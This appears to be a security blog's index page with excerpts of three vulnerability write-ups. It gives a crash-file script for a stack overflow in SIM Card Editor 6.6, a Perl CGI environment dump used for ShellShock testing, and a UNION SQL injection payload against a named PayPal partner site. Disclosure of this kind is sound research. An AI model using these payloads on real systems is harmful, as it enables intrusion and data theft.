Sim Editor Stack Based Buffer Overflow

Last week I bought a SIM card reader. Along with it came the software for it. It was SIM Card Editor 6.6. You can download it from here. The app is pretty cool. You can manipulate the SIM cardโ€™s data with it. However I noticed something strange in this application. When we are loading file for example suppose with 4 โ€œAโ€ characters we would get the output as โ€œยชยชโ€. Just two characters will be displayed. When I gave the input as โ€œ4141โ€ the result would be โ€œAAโ€. This time the correct output we need. What was the reason for this? From what I noticed was that when we enter โ€œAAAAโ€ the hex values would be โ€œ\x41\x41\x41\x41โ€ the app will take two values each and evaluate to hex.

When we give the input as โ€œ4141โ€ this is what happens.

So suppose we want to enter a hex string we have to just give the input. For example we want to give the application โ€œAAโ€ we have to give just โ€œ4141โ€. Taking that into consideration the rest was easy. The return address is overwritten with our buffer.

buff = "41" * 500
with open("ex.sms", 'w') as f:
    f.write(buff)

(more…)

Advertisements

My ShellShockings

While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.

use CGI;

$cgi = new CGI;

for $key ( $cgi->param() ) {
	$input{$key} = $cgi->param($key);
}

print qq{Content-type: text/html

<html><head></head><body>
};

foreach $key (sort (keys %ENV)) {
	print $key, ' = ', $ENV{$key}, "<br>\n";
}

for $key ( keys %input ) {
	print $key, ' = ', $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request">
         <input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get  Request ">
         <input name="getfield" ></form>};

print qq{</body></html>};

>

Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfect.
(more…)